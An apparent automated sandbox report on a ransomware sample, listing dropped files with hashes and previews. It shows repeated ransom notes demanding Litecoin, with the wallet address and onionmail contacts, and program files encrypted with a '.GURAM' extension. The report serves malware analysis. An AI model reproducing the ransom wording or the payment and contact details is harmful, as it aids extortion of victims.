                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\yo-NG\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\zh-CN\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\zh-TW\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft OneDrive\setup\logs\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):104002
                                                                                                                                                                                                                                                Entropy (8bit):7.998585778826238
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:1536:DZHwWvZhgsd2Zttd6lorgkH5AMUEPHRNTZA238J+v2HBjzP8290b5ZGXFhY584C8:VQWvQsdIrAcxNJ9UBPEk0b5Unz4CMUs
                                                                                                                                                                                                                                                MD5:73D6DDF0305FCCBD53A4835E077BBBC0
                                                                                                                                                                                                                                                SHA1:1C0A3435E5A941B98CC886A2E25A54C8EBB39DF0
                                                                                                                                                                                                                                                SHA-256:699A08EED086028121E7F2540F0C84534E6CCDA00FF8CD39C6E3D07EAAFC73A0
                                                                                                                                                                                                                                                SHA-512:C16B92172EC2DFD667C485C933D76C29964C1E6B2959D2E94DB15CB618F2C249E39B5A9888055A73F139B9829A07CB64E2E4F47A59D609F4CA2F7E86BBE61665
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.(.\/.....9...^J...q;..5~.}.R......A..|...........V....Q...MB+F.<..i.H...}..P.+.l]>..q...D...4.)j..@..*1..-..:..(.f.(.!....>.....5u2$s.Q...*.q.H..C..'...Q....... *c..0..4..&.".v.F.......W.z..v......(..T.+F..c.....$...-.~u".R.J=;.>.\.&.8...?.=..0.<Qj.D`k....O..X..$..."[.1.[a5.OT_*...d.`..u.......\=....s.........._.......Q...k..._X.1.p.-..o..\.v_.. .uL.1..%....v...2.<D..N.......$.r...i)=%..f^.u.s........;..(..x.c.....7........D.o......"..syy.*8.2.g.Z..C...@Bu...e.e.-....4...0..g3D.BA..i.adS..@r..|.,)......Q..F..sBEhzxxR.^G....^...bZN......^.[:.C#1...k|v..7......[Ea....z.%s..Jb6...+.DO0...6.B...B{U_..2`WqA.......l^..w....N.#...G.p..;...M:...........w.Tv....<...mr......k.`=...k.&-..cW8O.v......F_........o.J..vP.".......D.n.G....-~..Q...... -[a...l...?p..i.3y5....;......O..)E.... ...B..@..............'..|j./...!...................h!|])....`q...P#.!....@b.._/...k...L...iW..)..k.Od....J(.B?'D......jVV7.b^1.k.m..."Zh......_.!.]].J.1...>..2...u..z..

                                                                                                                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):239616
                                                                                                                                                                                                                                                Entropy (8bit):7.999202468035808
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:THBdKab55HP+uMZD68MyGfkgf2F9N7sfz2LsH0:tMaFkn688kgfaRu2LsU
                                                                                                                                                                                                                                                MD5:EAB2A9A136327C0EB4F764EBD3765896
                                                                                                                                                                                                                                                SHA1:D5B2C334E6681D597AE897AB594EA558CD1C5F33
                                                                                                                                                                                                                                                SHA-256:1EBC3E2CA202098BFA630981ADBDE36C513E4C4764C6F8540712EF705534FBC1
                                                                                                                                                                                                                                                SHA-512:6599100F7CEEEFD957E20DE04C87558AF243CD6DDC8ACEF4AE64325B3BD91B563374C1730928D7E023AE0B503563E9E614B126D2C8CFDBD3BADD61467258F354
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:"K..r..R..W.....#.c.S....L}.c.y.<........=...6..@...H!.n.tDV.N.G.......j.S.*.h.....y......2`W...&K.,...?{y..F.| 4.8"zU..q..]v;7{1.Yy...*...n..I_.}.;q(Pn..y.Dl}s.j.b.-..:..>...:.....-...o......#..?.9..U+xXpq......~...wH.......BI[S..jR..s..w_}A.....=H.!6h.?i.F.|.H............#^].B....*.E..s....+...6.v.P.^.8....v..."(...w....D._...q.+..7.......A.4..)......*xY_.... x+..Rw.T....7xf.=......S...Le)^L.....y.Z7=.j@....F..JBj. ..+z..OL.0q..C.............e..'.\t.........@.[*%.....^..I..J.Q.U..m..."x.].1n.......M.I.4_u......"..K-5{.I...S..)..V%.)7=J.aS......_(....!.....v.=......w..ex....*.8..H.X.*K...g..<./...,a9b..Z...V ......x.6...0..-Q.C.',......G..E....=A...=..s..F..R....;..]..w....I........P^..~I.u./......6.I..,.u.z..i%U...WES.+.U^...0j..`w....t..r...`.....C_......q..u*...a....vM.{...M|`...*"...~...U:oUv..yca.....W...@.rc.qj.c.qg......o.6P...T.-.......c...|........-.r.....m......0|...+X).dW~v....#^.w.......E.......^.."......!cw.Kj...

                                                                                                                                                                                                                                                C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1810
                                                                                                                                                                                                                                                Entropy (8bit):7.894808169244127
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:VOamYerUB263/1UwbMSpyRaxvS0korL4o0jZtwV/:VV/KReJrQleV/
                                                                                                                                                                                                                                                MD5:172CD05C59F506978AEEF39AA39D7B11
                                                                                                                                                                                                                                                SHA1:56E39A2C4B3FF52AE1199F87D871F537DDC85A08
                                                                                                                                                                                                                                                SHA-256:4E11F0FAD3CB12C2CB6C2D10F91BABD246A86845DA00EDED6116B4602A6AC814
                                                                                                                                                                                                                                                SHA-512:F537D6712737121F809119976764CBC8AA8302F9D93492247BB9795904A511525FC3393EB4F777F4A9FC46C2C18E3B2139218EC15A066FE3402805E220C6A267
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...vVT.....^.M...}'....$E.......9\...%_n.#.7......$Q.Rt..O".......n.P'-../......P.........e.7..{.2....}K.y;I....4......*..f.{C........2yG.Nq..b.B29.a.:.n.2.Yb...&....A.2.{-..J...(.....o&eyN.~...I8=I~[...6.7...^".Q..J`tz'v.k@....>.R.1..t0....A.Z,.m.s.WV...W..?.RNmd...]...F.Ch../...xD{.7..Xxe=.I 3..5..>..yx.^w.w..j.o.l.1.......p.;.J...Y.v.a..A...|b.R^.wfh..~2.0..2{_..`......>p'e.....g..I..Q)...!...Hq..[."..........9.z.~F2t...].7....}PAf...uv.'....|q..&...!..L.....0.8..>.g.....2<.....)..).$........s...n6uq..!..'.......o....Gf.NC..nn x...nC..VR.b+.M.6..H\.#.8}...7...!...Z.....7u.....(..7#:.xr.....f`r....".y..~.......Dv....w6?p.m.%.q..E.:.....@..!G2..C .a...*.mPT|..o..0.$...th.A..z.z.w_....e.!......i.Dr...d.....#.~m.1......Bwl..&i...M....m..^7..[...[LE.-..D....c..a.E.s......2...C....k>/R.......1...:G..4.#h.E.4e.z..{.|.?..I.!L_..E_.....5#N<...am......... k.........nZ...1..}...r,C...[......3...Vn.....7 .=@.+h..'.yx.(../...X.BJ.L.&.[..As...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Aut2Exe\Aut2exe_x64.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800896
                                                                                                                                                                                                                                                Entropy (8bit):7.6867737478406655
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:Rr9CI6UBHK2NocwiN/jc41p3qp11JsqnRLNfWe1xTVIl+qWOHPjnikEpx/nLWvyO:Rr7HfYP1Js4nOkSyOHTiRPnLWvyO
                                                                                                                                                                                                                                                MD5:EE4C1F4C1238E2557429A55FA3D81A2B
                                                                                                                                                                                                                                                SHA1:18578802F20056B8904986C7BA7D5542849D2C7F
                                                                                                                                                                                                                                                SHA-256:04E7547A187A072417187FEDC30100E6C7F2D1AA769CB7E930F78B95A953942F
                                                                                                                                                                                                                                                SHA-512:A2337B75843F6AC16C715415401880EFEFBFDA36340BA8D4720234682E4212A30BB6E3FF5E10AB8BF8012F0032D38315232ED4F7247D24ACDE0E265D7B8DD7E6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.6..P.E.k.j..nm...=..|....d.U.......C.&I..U..LY................<...ge....j.._.u.....G.A..L!.c!.{...SX..RW..x..97.d...P......C&q...l4r?.0B.C8.<..+........T...B..=....6..Y.=tX......2nI...7b...5FDM.......i2.K.>...B..G..d.I.\(...e..\.s.....,I...&.R...#Hj..v........2...+w.)..M...m0.!... .L..S....}.z...C...o..r....]/.(..P.#b.....[+|h..Pm...$J...4P..l.O.:n..6qA.........".....C......$.$.&""..g..6P.2...f.4..d..M..&....C...Pc..X.N.j.v.V....!.....`H..k..H0.2...r......4..o.yV:.............6N9.B......#H.U..=.......8..h.9...F..........Oay.3...R.d...j.0+..&-...0...jZ!m/e7.r.F..j.K.|&...C..G...7.=.B......8...9....Ik.']...*A..M....=L.J;.y.v.w..b.*u.d3CC..>[..... ....$..L+...........-/..,i..,..y.~.6...P$P..#;dq....".......Z2.J...|...zh.)d...Y.}....'t>.6.'s...q.....)..?+.4E.%...~u......f...I#.C...Sz...Q.%...-u.N9*c.!MQa8...t.R...?.....V..)....o..."z..}.#.G......`......%"!}...t.....Q.0....O....jb..y.H..u.......7....g.HS....r..F.`.\...!..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Aut2Exe\upx.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):305760
                                                                                                                                                                                                                                                Entropy (8bit):7.999420162246661
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:amQOoWoOSl+jLgMOMtlA9FxQMXdRxbka+cVWs0OnF2pFVh2oBou1H:XoWoOSlXMOglAXGMD9Vnn6B1H
                                                                                                                                                                                                                                                MD5:F6F9534CB070A9984032EC7308C9058B
                                                                                                                                                                                                                                                SHA1:B4CEC2816C7FA6D1383F1A8AA4936FE37EC378E4
                                                                                                                                                                                                                                                SHA-256:B29E511EB5E4F3074B4DCF37D913AD9665EA1772F0951B49200ABE2C8C5049F5
                                                                                                                                                                                                                                                SHA-512:3CAAD20423E9F610FB38279CFFC02A66ABF1069AA8F0F989EF5292E523C600B08F588B5DC4E19B976832C8E588ABB816308EF8045A7FFEBD95E10EBEC91F9EC7
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:. w....6..K...M..Fa}..66....GLX.^...L.G...r....p.~Wm.RW'.,.%m.(.-.-.!.>........A\.:s.6n.w%..b...Lu.. >..zQ@9.b...~A.r..Y..~c"....F...yuP.......~......2(...z<.ky..EL..ht.XoC..X7...2.9..........H=C....li{..m.R.W..2=.m..%B...G.N......_...O.^. g.!.....$.+_};M..G8..p[.X.....<...+5..V.Y].L..y''.`o5&~.h+.C........)/..p.L.....?vt..0(......+.,.O=....8.B.?".#.z+<.1...O\6..;...~^o..KA.(....|.........up......^.... %.......-P.7.......v..&_.N.J..Yl...n.h..l.+.Q..........A~......u...].S.1....d.. .. u.`O...|.z......OC...Y=...mv....r^.+.....?.%.....*:..b..^.@@Dj..X...a*LCxu..=Lp...x.a..pj.c.y3.0..}.C7..F._z.+U.[....'.dG..9{.1.L./.).Y.rgWO......d.G........\^|.nG...V.....Z..C.g.z2.QR.P....V.\..Z..~t.Y.mH+.r>mS9..{.w..NG..e.\.]d.$..LQ.y...-ZE.......j.G....2...Sq,Z.G]..=c.z.@..k.Nx......DE(Jm N...1d...nH.$.ke.V..U....=[F..Vzc++.`d.?.2...R...=....{.j.3....4..A.........7..R....X$.v...8.1Z...T.*.J.1L.T.....~.Z~.....j..E....z..OZz...^...*..km.....#j(..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoIt3_x64.exe.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1072312
                                                                                                                                                                                                                                                Entropy (8bit):7.042643318775987
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:IHCl6Rb6qu1PyC+NRLtpScpzbtT7pyOolKLp5stQ95IVxaNIz3j:SS6AqSPyC+NltpScpzbtvpJoM95sts5O
                                                                                                                                                                                                                                                MD5:D72005C8FC73E2332075DD19E654412B
                                                                                                                                                                                                                                                SHA1:C001476737F31EE9DD9DDF03AC71117BBD0A23AA
                                                                                                                                                                                                                                                SHA-256:06751D8282FF53C3AFB1DCD42514AEFCC0E7F417A5180E7A42D7AD658EBF3920
                                                                                                                                                                                                                                                SHA-512:98C60C886D9A4C3322AA6FD197FB11FCF84DEB9B8C0984B2295BCD3230128BFA6844B879EFF732EAB21358BFD5D24F4FF3E190A50E5B4F3E5C61F1E1B0478F5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....<....8q.U.... .0B.}u{q..*.=.?..)P.......@.`....U...[..C*iB.......|r.&v./......[....j..L..K.|^.......}*..%qZ]_.h&.4.T.Y#[...X.FI.F.'R;..c.[F1.....#.....8.U .}...%...D..J...Jo.D..:.E...q....c.....x.j.Hk......k..&..nM.~G.-.0...........I.Fkf....!..;...Fsv..HNj.V.ED........Zg(]9..]......._;-_L.B.<u....o.j..+L.?.C.....;....i.y.1j5.d.......S.8>..J.J....5..0s...O.....-yb=...5....o.g.'.Z......NQ*".Z.s...1y.:'K.M..+z9...^.:F..........H=o1c...K..tqU...*.+..0=....<.....%.>.Q.R..t.*..xO.=..M.Jd.\...t......,&<..X.5.`}.)..!..O....`.^.+...*\....e.N....@%'.@.7......9././..e.....#....0q4..c....P..K.....b.<..:.m.|./S *..W.._..tU$...Q.V^.G..T*{.a1..4C._..h..7.....7x.lC.n*~2......F..N....ZD..@q.......p...d!#.W....J/D..w.ZQ.>....h.u...=.*.C...5R.X8.s....e..5......LcU#[$Q.*....<.H..R.......].v.J..........r..V... d7dE.;...M.9;f.....W#U].?.L_s.D.....sJh..B..sg..9~pp.-..Qs.V.X.Q..On,Ynx{0....~...N....k...R;...:.0.... ..'.=....../u..'.g.B>f.......ZL.Q'....R

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX.chm.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):200994
                                                                                                                                                                                                                                                Entropy (8bit):7.998981159391042
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:D2Oe5kERXQ5dLYgoe6dBO/ZBkPsJOC1cbn3tNrPX:BqkIXQLLsu3Rcb9NLX
                                                                                                                                                                                                                                                MD5:8448DCEC14DD0FE50CDE5FDA75145A87
                                                                                                                                                                                                                                                SHA1:5D09BF1E54A0D1617E94FF144040912400671F40
                                                                                                                                                                                                                                                SHA-256:D64E73F8D2B87AB773B02456474FC16625AC543710CAB777FBD7461435EE1906
                                                                                                                                                                                                                                                SHA-512:728F00299214EBC0E324C2DD4DB5F28B5049290D2FA23522CD06D8F4B805EE993A28AACEDA57E07A81CCFF044B070525DA8199BF7601B8E638F07D225D7E69B3
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..&UrY....'...n...C..;.+.......L./2^km/..G..`O.b......c...........19.sX.?....$k...b>..:...8...J.p...^u&...V.....6.q,^+..<.......Y ..._....C..1..M..X.l...8.s,...Z.}..x.*.U.(......G..v....E&..a..'.D(...=.....S....wI..S..8.j..A.6.......a.}{....Y..K.o.......NpO..u...6N..t.tqm.....&....Z:f.@.......,.3..eNb....U.../......"L...ZS.F.M..R.0.D.._.:n.]../..?nE.X.;@.*X..a$I.*...C0..|U..h4..;.2,.+B.NQ....n.7.]Ssh..*...I5.k.~.r.X..../S+.O](8ja.9#.y].(^...<.i...J~^.."...70HS.P.d.,.va.y.o.i.....V..k.`..y..M..y.6|......!........N..>...{.a..AD|z-6....Y.j.Qa.$g0...d._.@..Y..C_.......iz.Vz...c&.@.i..}..9+E...Ej.....#..&.q..!.6*$.....F.#.V...E..d.w..Y...2+6.H01<)C+.H..fk.k."..u....Q..:..H.."...ZH..j5......' Q.s..;Z.I..{.5...\.....s.d...w.h^N.q..(!..!.wg..X. .Z.|....H>..ka.V....)sZh Z@.mh.1.x...06r+...%R...OS....@.S,r.&.s..S.Q15.. ...}...WaI:...L.7b...s.-.Q..T.[.]...cM.......ns.D.*......u.o...;^e..0,.....m..O.{..PO.{f.{_y$8f....dKi....e.._...~..{..5'>.q..........

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX.psd1.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):34062
                                                                                                                                                                                                                                                Entropy (8bit):7.994031065331187
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:384:EeQFLrXffTsV6qlJ941d3Z6H7Oizml5CxklraySzF4B8GjiBf4rDn4zpzGbs8utX:CLbnTrgf23o85CxSSl54EzG48utX
                                                                                                                                                                                                                                                MD5:0245C3EAD73E5C8241C1DBEA6E7DE79C
                                                                                                                                                                                                                                                SHA1:4154868A2F899EF4465C647183024019D9CD029D
                                                                                                                                                                                                                                                SHA-256:54B3C349CCF23E869F61AF7C5EAC3DBEE37DDACC7FCA6A061265FF76BFBDCBBA
                                                                                                                                                                                                                                                SHA-512:EB885DA1A8B8730BDFD4DBC2C7CEA711AC44DFB9D8363C31897D4484572C3529FCCB88242F2144F2767186A40F08C846F7496B3DBC4BACAE9464BF02C7F97F51
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....n.BZ..h....4.*q....h...!.O/.A..M1..._F.X..!b....p..A=...k.!....s...pJ.2..)..N...>.......Y@...CA..J.$.S<>S..?..y.S...![....gv....(k...R..D.9.yz..V.q.....*]...u....s2..\.....:RP..F.J.V(F.cl..jd..zA...EI....Q'L.....JkZ.KY.%...`.........F.........?..[z....%./.|...|".L...*.,......1..x..XO....-/....JKJ...$.`.{6..B\0..P.Xwy.2...Ex.4..BP.....Z()]O....[..}.+..e.lA'..JH...>x..7.{y(.c}....z..At.I...=g1.9n..N..I3CWG....j........O&.]..... ..........}IF...5.c..u......Z...o$..T7.......&..,......N.F..;.[.].q@D....^)....73..U.....J..X.\...u.1....a.F9.?..m...#...@.1S2..^.s......GX...e.e.N......=./Il.4../.h.&`E.....Or....~.pf....,..4.........7...>.d...w.. ...{.x.!..^D...{....8...S8.dO.-nr..Kn.....d..Z.....b.@j..g.2..d......&..3YU..{Y...[...s.X.....&.G.z..Ee...p...nX....*.3q;b.......1...H..E.......e.q.....;..FQG.*..../....q..8.|.j.........i..!..%0.....(.m...VD.G.j%...${.....C.Nc.Vo.[.w\S..3...y..F,...Y..9..8.,..../E..Oq...Y.:B..j..i..3v..WA.+".u9..2) n./#

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\AutoItX\AutoItX3.Assembly.dll.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
